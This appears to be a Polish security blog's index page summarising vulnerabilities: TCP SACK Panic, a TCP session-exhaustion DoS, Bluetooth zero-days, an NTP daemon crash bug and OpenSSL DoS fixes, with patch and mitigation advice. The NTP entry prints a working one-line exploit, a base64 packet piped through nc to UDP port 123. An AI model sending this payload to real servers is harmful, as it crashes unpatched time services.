W pierwszym biuletynie bezpieczeństwa za 2019 rok firma Netflix ostrzega przed opartymi o protokół TCP zdalnymi atakami typu DoS, które dotyczą zarówno systemu Linux, jak i FreeBSD. Ich poziom jest określany jako “krytyczny”. Luki odkryte przez Jonathana Looneya dotyczą w szczególności maksymalnego rozmiaru segmentu (ang. Maximum Segment Size (MSS)) oraz potwierdzeń selektywnych (ang. Selective Acknowledgments (SACK)). Najpoważniejszą jest luka “SACK Panic”, które pozwala na zdalne wywołanie paniki jądra systemu Linux.
[ czytaj całość… ]

J

akiś czas temu została znaleziona luka / podatność, która może mieć wpływ na większość usług korzystających z protokołu TCP. Jest to nowy wariant ataku Denial of Service, który może zwielokrotnić efektywność jego tradycyjnej formy. Ideą tego ataku jest zamknięcie sesji TCP po stronie atakującego, pozostawiając ją otwartą po stronie ofiary. Zapętlenie tej czynności może spowodować szybkie zapełnienie limitu sesji ofiary, co skutecznie uniemożliwi innym użytkownikom dostęp do usługi ofiary. Jest to możliwe poprzez nadużycie RFC 793 (str. 36), który nie przewiduje wyjątku, jeśli pakiet reset (RST) nie zostanie wysłany.
[ czytaj całość… ]

J

eśli używasz urządzenia obsługującego technologię Bluetooth: smartfona, laptopa, TV, zestaw w samochodzie, czy inne urządzenia IoT – właśnie stałeś się narażony na ataki ze strony złośliwego oprogramowania, które może zdalnie przejąć kontrolę nad Twoim urządzeniem nawet bez potrzeby interakcji z Twojej strony. Naukowcy ds. bezpieczeństwa właśnie odkryli w sumie 8 podatności typu zero-day w protokole Bluetooth, które mają wpływ na bezpieczeństwo ponad 5.3 mld urządzeń – od Androida po iOS, Windows i na systemie Linux kończąc.
[ czytaj całość… ]

N

owy błąd w daemonie NTP pozwala na przeprowadzenie ataku Denial of Service za pomocą jednego, spreparowanego pakietu UDP, który wywołuje null pointer dereference. Atak można przeprowadzić zdalnie, a atakujący nie musi być uwierzytelniony. Cały atak ogranicza się do wysłania na port NTP wiadomości:

echo "FgoAEAAAAAAAAAA2bm9uY2UsIGxhZGRyPVtdOkhyYWdzPTMyLCBsY"\
"WRkcj1bXTpXT1AAMiwgbGFkZHI9W106V09QAAA=" | base64 -d | nc -u -v 127.0.0.1 123

Podatne są wszystkie wersje do ntp-4.2.7p22 z wykluczeniem ntp-4.2.8p9 oraz do ntp-4.3.0 z wykluczeniem ntp-4.3.94. O ile aktywnie utrzymywane systemy operacyjne poradzą sobie z aktualizacją pakietów – ponownie nie wszystkie urządzenia korzystające z wbudowanych systemów będą mogły zostać zaktualizowane. Większość urządzeń nie posiada już wsparcia ze strony producentów lub dostarczenie odpowiedniej poprawki może być bardzo przeciągnięte w czasie. W takich wypadkach należy wyłączyć usługę serwera czasu (jeśli nie jest ona w ogóle potrzebna) lub ograniczyć do niej sieciowy dostęp tylko z zaufanych źródeł.

Więcej informacji: Vulnerability Note VU#633847, CVE-2016-7434

F

undacja OpenSSL wydała tuzin poprawek na wykryte podatności w swojej kryptograficznej bibliotece wliczając w to drastyczne błędy, które mogą prowadzić do przeprowadzenia ataków Denial-of-Service (DoS). Podatności istnieją w wersjach: 1.0.1, 1.0.2, 1.1.0 i zostały odpowiednio poprawione w: 1.0.1u, 1.0.2i oraz 1.1.0a. Pierwszy błąd zgłosił Shi Lei z chińskiej firmy ds. bezpieczeństwa Qihoo 360 – polega on na możliwości wysłania obszernych żądań typu “status” do rozszerzenia OCSP podczas negocjacji połączenia, co może spowodować wyczerpanie się pamięci na atakowanym serwerze. Drugą luką, która również umożliwia atak DoS jest przesłanie pustego rekordu do funkcji SSL_peek(), co spowoduje jej zawieszenie. Poza tym naprawiono dwanaście innych problemów niskiego ryzyka. Warto odnotować sobie, że wsparcie dla OpenSSL 1.0.1 kończy się 31 grudnia 2016 roku dlatego użytkownicy powinni zaktualizować swoje systemy do wyższej wersji w celu uniknięcia jakichkolwiek problemów z bezpieczeństwem w przyszłości.

Więcej informacji: OpenSSL OCSP Status Request extension unbounded memory growth (CVE-2016-6304), OpenSSL Security Advisory [22 Sep 2016]

Z

naczniki czasu określone przez RFC1323 służą między innymi do ochrony przed “owijaniem” się numerów sekwencyjnych (PAWS – ang. Protection Against Wrapped Sequence Numbers), czy obliczaniem opóźnienia pomiędzy wysłaniem segmentu (PDU – ang. Protocol Data Unit dla warstwy transportu), a otrzymaniem potwierdzenia jego otrzymania (RTTM – ang. Round-Trip-Time Measurement).
[ czytaj całość… ]